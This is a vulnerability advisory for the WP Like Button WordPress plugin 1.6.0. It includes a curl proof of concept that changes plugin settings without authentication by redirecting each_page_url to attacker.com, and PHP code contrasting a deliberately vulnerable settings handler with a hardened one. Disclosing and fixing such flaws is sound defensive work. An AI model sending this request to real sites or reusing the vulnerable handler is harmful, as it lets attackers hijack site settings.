
WordPress Plugin Like Button Authentication Bypass

WordPress Authentication Bypass

An authentication bypass vulnerability in the WP Like Button plugin version 1.6.0 allows unauthenticated attackers to change the plugin's settings. The contains() function in wp_like_button.php does not check whether the current request was made by an authorized user, so any unauthenticated user can successfully update the plugin's settings.

Proof of Concept

The curl command below allows an attacker to change the each_page_url parameter to https://attacker.com, which lets the attacker hijack the Facebook likes of the affected site.

```shell
curl -k -i --raw -X POST \
  -d "page=facebook-like-button&site_url=https%%3A%%2F%%2Flocalhost%%2Fwp&display[]=1&display[]=2&display[]=4&display[]=16&mobile=1&fb_app_id=&fb_app_admin=&kd=0&fblb_default_upload_image=&code_snippet=%%3C%%3Fphp+echo+fb_like_button()%%3B+%%3F%%3E&beforeafter=before&eachpage=url&each_page_url=https://attacker.com&language=en_US&width=65&position=center&layout=box_count&action=like&color=light&btn_size=small&faces=1&share=1&update_fblb=" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  "https://localhost/wp/wp-admin/admin.php?page=facebook-like-button&edit=1"
```

Prevention

No update has been released by the vendor. Users are advised to switch to a different plugin.
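For plugin developers, the following added PHP example (written for this article, not the WP Like Button plugin's own code) contrasts a settings handler with the missing authorization check described above against a hardened form; the function name fblb_save_settings, the option name fblb_options and the nonce action name are assumptions for illustration.

```php
<?php
// Hypothetical settings handler modelled on the flaw described above.
// Not the plugin's actual code: fblb_save_settings_*, fblb_options and
// the nonce names are assumed for illustration.

// Vulnerable pattern: the handler trusts any POST that carries update_fblb.
function fblb_save_settings_vulnerable() {
    if ( ! isset( $_POST['update_fblb'] ) ) {
        return;
    }
    // No capability check and no nonce: an unauthenticated request can
    // point each_page_url at a site the attacker controls.
    $opts = get_option( 'fblb_options', array() );
    $opts['each_page_url'] = $_POST['each_page_url'];
    update_option( 'fblb_options', $opts );
}

// Hardened pattern: require an administrator, verify the nonce bound to
// this action, and sanitize the URL before storing it.
function fblb_save_settings_hardened() {
    if ( ! isset( $_POST['update_fblb'] ) ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // Calls wp_die() when the nonce is missing or invalid (CSRF defence).
    check_admin_referer( 'fblb_update_settings', 'fblb_nonce' );

    $url = esc_url_raw( wp_unslash( $_POST['each_page_url'] ?? '' ) );
    // esc_url_raw() still permits ftp:, mailto: etc.; accept only http(s).
    $scheme = wp_parse_url( $url, PHP_URL_SCHEME );
    if ( '' !== $url && ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        wp_die( 'Invalid URL', '', array( 'response' => 400 ) );
    }
    $opts = get_option( 'fblb_options', array() );
    $opts['each_page_url'] = $url;
    update_option( 'fblb_options', $opts );
}

// The settings form must emit the matching nonce field:
// wp_nonce_field( 'fblb_update_settings', 'fblb_nonce' );
add_action( 'admin_init', 'fblb_save_settings_hardened' );
```

With the hardened handler, the unauthenticated POST shown in the proof of concept fails the capability check before any option is written, and a logged-in administrator tricked into submitting the form fails the nonce check.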
